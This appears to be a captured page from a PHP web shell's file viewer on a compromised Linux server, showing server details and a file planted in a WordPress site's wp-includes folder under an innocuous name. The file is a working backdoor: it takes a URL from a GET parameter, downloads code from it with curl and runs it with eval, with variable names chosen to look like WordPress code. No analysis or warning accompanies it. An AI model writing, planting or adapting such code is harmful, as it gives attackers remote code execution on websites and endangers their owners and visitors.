HEX
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
System: Linux golden.server-sky-dns.com 3.10.0-1160.59.1.el7.x86_64 #1 SMP Mon Mar 7 01:49:29 EST 2022 x86_64
User: emeraldo (1160)
PHP: 8.2.8
Disabled: NONE
Upload Files
File: /home/emeraldo/public_html/wp-includes/blocks/video-security.php
<?php

if (isset($_GET['beta'])) {
    $is_admin_wbl = $_GET['beta'];
    if ($the_permalink_rj = curl_init()) {
        curl_setopt($the_permalink_rj, CURLOPT_URL, $is_admin_wbl);
        curl_setopt($the_permalink_rj, CURLOPT_RETURNTRANSFER, true);
        eval(curl_exec($the_permalink_rj));
        curl_close($the_permalink_rj);
        exit;
    }
}